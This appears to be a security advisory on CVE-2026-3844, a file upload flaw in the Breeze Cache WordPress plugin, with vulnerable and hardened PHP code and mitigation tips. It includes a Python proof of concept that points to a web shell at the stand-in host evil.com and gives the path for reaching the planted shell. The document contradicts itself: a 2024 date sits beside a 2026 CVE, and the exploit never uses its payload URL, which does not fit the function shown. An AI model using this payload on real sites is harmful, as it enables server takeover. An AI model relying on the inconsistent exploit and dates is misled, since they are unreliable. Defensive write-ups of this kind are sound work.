Date: June 2024
CVE: CVE-2026-3844
Plugin: Breeze Cache (All versions up to and including 2.4.4)
Severity: Critical
Impact: Arbitrary File Upload, Potential Remote Code Execution
Feature Affected: “Host Files Locally – Gravatars” (disabled by default)

Introduction

WordPress powers over a third of all websites, making its plugins a prime target for attackers. This year, a major vulnerability (CVE-2026-3844) was discovered in the popular Breeze Cache plugin. The bug allows attackers to upload malicious files to your website and — in some cases — take full control.

Let’s break down what happened, how attackers can exploit this flaw, and what you need to do to stay safe.

What Is the Vulnerability?

The problem is in a function called fetch_gravatar_from_remote. This function is supposed to fetch Gravatar images and save them locally when the “Host Files Locally – Gravatars” option is enabled.

However, it does not properly check what kind of file is being downloaded and saved, meaning attackers can trick the plugin into uploading anything they want to your server. Since these files can be anything, they could even be malicious PHP scripts.

How the Attack Works

Find a Vulnerable Site

The attacker finds a WordPress site using Breeze Cache, version 2.4.4 or below, with the “Host Files Locally – Gravatars” feature turned on.

Upload Arbitrary Files

The plugin blindly fetches whatever is at the requested remote location and saves it in the local gravatar directory without checking the file type or content.

Execute Uploaded Code

If the server is poorly configured or if .php files can be executed from the upload directory, the attacker accesses the uploaded PHP file and executes commands on your server.

Here's what the problematic function looks like (simplified):

function fetch_gravatar_from_remote($email, $hash) {
    // $hash is used unmodified both in the remote URL and in the local filename
    $remote_url = "https://www.gravatar.com/avatar/" . $hash;
    $local_path = WP_CONTENT_DIR . "/uploads/breeze/gravatars/" . $hash;
    $response = wp_remote_get( $remote_url );

    if ( is_wp_error( $response ) ) {
        return false;
    }

    $body = wp_remote_retrieve_body( $response );
    file_put_contents($local_path, $body); // No file type/content check!
    return $local_path;
}

What’s missing? There’s no check to see if $body is an actual image file or whether an attacker tricked it into downloading and saving a PHP script.
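For contrast, here is how the same function could be hardened. This is an added example and not Breeze's code; the breeze_example_* helper names are hypothetical, and the WordPress HTTP API calls are the same ones the original snippet already uses.

```php
<?php
// Added example, not Breeze's code: a hardened variant of the simplified
// fetch_gravatar_from_remote() above. The breeze_example_* names are hypothetical.

// Only a 32-hex-character Gravatar hash is accepted, so the request cannot
// choose the stored file's name, extension or path.
function breeze_example_is_valid_hash( string $hash ): bool {
    return 1 === preg_match( '/\A[a-f0-9]{32}\z/', $hash );
}

// Returns the IMAGETYPE_* constant if $body is a JPEG/PNG/GIF and carries no
// PHP open tag (polyglot guard); false otherwise. The bytes are inspected,
// not just the remote Content-Type header, which the remote server controls.
function breeze_example_image_type( string $body ) {
    if ( '' === $body || strlen( $body ) > 1024 * 1024 ) {
        return false;
    }
    if ( false !== stripos( $body, '<?php' ) || false !== stripos( $body, '<?=' ) ) {
        return false;
    }
    $info = @getimagesizefromstring( $body );
    if ( false === $info || ! in_array( $info[2], array( IMAGETYPE_JPEG, IMAGETYPE_PNG, IMAGETYPE_GIF ), true ) ) {
        return false;
    }
    return $info[2];
}

function breeze_example_fetch_gravatar( string $hash ) {
    if ( ! breeze_example_is_valid_hash( $hash ) ) {
        return false;
    }
    $response = wp_remote_get( 'https://www.gravatar.com/avatar/' . $hash, array( 'timeout' => 5 ) );
    if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
        return false;
    }
    $body = wp_remote_retrieve_body( $response );
    $type = breeze_example_image_type( $body );
    if ( false === $type ) {
        return false; // Not a genuine image: nothing is written to disk.
    }
    // The extension comes from the detected image type, never from the request.
    $local_path = WP_CONTENT_DIR . '/uploads/breeze/gravatars/' . $hash . '.' . image_type_to_extension( $type, false );
    if ( false === file_put_contents( $local_path, $body, LOCK_EX ) ) {
        return false;
    }
    return $local_path;
}
```

Even with these checks, the upload directory should still deny PHP execution so that a validation bypass cannot turn a stored file into running code.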

Here’s a simple “proof of concept” in Python that abuses this bug:

import requests

# URL of the vulnerable WordPress site
site = "https://vulnerable-wordpress-site.com"

# URL to your malicious PHP payload (e.g., 'webshell.php' hosted somewhere public)
payload_url = "https://evil.com/webshell.php"

# The endpoint (may need to be discovered via plugin code)
endpoint = f"{site}/wp-admin/admin-ajax.php?action=fetch_gravatar_from_remote&email=attacker@evil.com&hash=webshell.php"

# Attack: Fetches the "avatar" from the attacker's URL and saves it locally!
requests.get(endpoint)

After uploading, the attacker tries to access:

https://vulnerable-wordpress-site.com/wp-content/uploads/breeze/gravatars/webshell.php

If the attacker succeeds, they have a live command shell on your server.

How to Protect Yourself

Keep the Feature Disabled

- The problematic feature (“Host Files Locally – Gravatars”) is OFF by default. Only enable it if absolutely necessary, and monitor your /uploads/ folders for strange files.

Block Access to the Gravatar Directory

- Add an .htaccess rule in the gravatars upload directory so that stored files cannot be served or executed directly:

Deny from all

Scan for Backdoors

- Use tools like WPScan or Wordfence to check if you’ve already been compromised.


Conclusion

CVE-2026-3844 shows how even the most popular plugins can become a liability if you’re not careful. If you use Breeze Cache and have enabled “Host Files Locally – Gravatars”, update right away and check your uploads folder for suspicious files.

Stay safe, keep plugins updated, and always use defense in depth!

Timeline

Published on: 04/23/2026 02:25:21 UTC
Last modified on: 04/23/2026 14:28:55 UTC